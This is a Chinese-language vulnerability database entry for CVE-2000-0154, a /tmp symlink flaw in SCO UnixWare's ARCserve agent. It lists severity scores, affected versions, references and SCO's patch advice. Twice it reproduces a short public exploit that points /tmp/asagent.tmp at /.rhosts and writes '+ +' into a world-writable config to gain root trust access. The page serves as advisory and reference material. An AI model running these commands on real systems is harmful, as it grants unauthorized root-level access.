CVE-2000-0154
CVSS1.2
发布时间 :2000-02-16 00:00:00
修订时间 :2008-09-10 15:03:07
NMCOES    

[原文]The ARCserve agent in UnixWare allows local attackers to modify arbitrary files via a symlink attack.


[CNNVD]SCO Unixware ARCserver /tmp符号链接漏洞(CNNVD-200002-049)

        UnixWare中的ARCserve代理存在漏洞。本地攻击者借助符号链接攻击可以修改任意文件。

- CVSS (基础分值)

CVSS分值: 1.2 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sco:unixware:7.1.1
cpe:/o:sco:unixware:7.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0154
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0154
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-049
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/988
(VENDOR_ADVISORY)  BID  988
http://www.sco.com/security/
(UNKNOWN)  MISC  http://www.sco.com/security/
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-15&msg=000101bf78af$94528870$4d2f45a1@jmagdych.na.nai.com
(UNKNOWN)  NAI  20000215 ARCserve symlink vulnerability

- 漏洞信息

SCO Unixware ARCserver /tmp符号链接漏洞
低危 竞争条件
2000-02-16 00:00:00 2005-10-20 00:00:00
本地  
        UnixWare中的ARCserve代理存在漏洞。本地攻击者借助符号链接攻击可以修改任意文件。

- 公告与补丁

        SCO has made patches available for this problem. They are available at
        http://www.sco.com/support.
        A suitable temporary solution may be to disable ARCserve.

- 漏洞信息 (19752)

SCO Unixware 7.1/7.1.1 ARCserver /tmp symlink Vulnerability (EDBID:19752)
sco local
2000-02-15 Verified
0 Shawn Bracken
N/A [点击下载]
source: http://www.securityfocus.com/bid/988/info

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable. 

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp

		

- 漏洞信息

7625
SCO UnixWare ARCserve Symlink Privilege Escalation
Local Access Required Race Condition
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-02-15 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SCO Unixware ARCserver /tmp symlink Vulnerability
Race Condition Error 988
No No
2000-02-15 12:00:00 2009-07-11 01:56:00
This vulnerability was discovered by Shawn Bracken. It was first made public in a Network Associates security advisory on February 15, 2000.

- 受影响的程序版本

SCO Unixware 7.1.1
SCO Unixware 7.1

- 漏洞讨论

A symlink following vulnerability exists in the ARCserve agent, as shipped with SCO Unixware 7. Upon startup, the asagent program will create several files in /tmp. These are created mode 777, and can be removed and replaced by any user on the system. If these are replaced with symlinks, files can be created anywhere on the filesystem, owned by root. This cannot be used to alter the permissions of existing files. However, the contents of the new file are contained in /usr/CYEagent/agent.cfg. This file is world writable.

- 漏洞利用

echo "+ +" > /usr/CYEagent/agent.cfg
rm /tmp/asagent.tmp
ln -sf /.rhosts /tmp/asagent.tmp

- 解决方案

SCO has made patches available for this problem. They are available at http://www.sco.com/support.

A suitable temporary solution may be to disable ARCserve.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站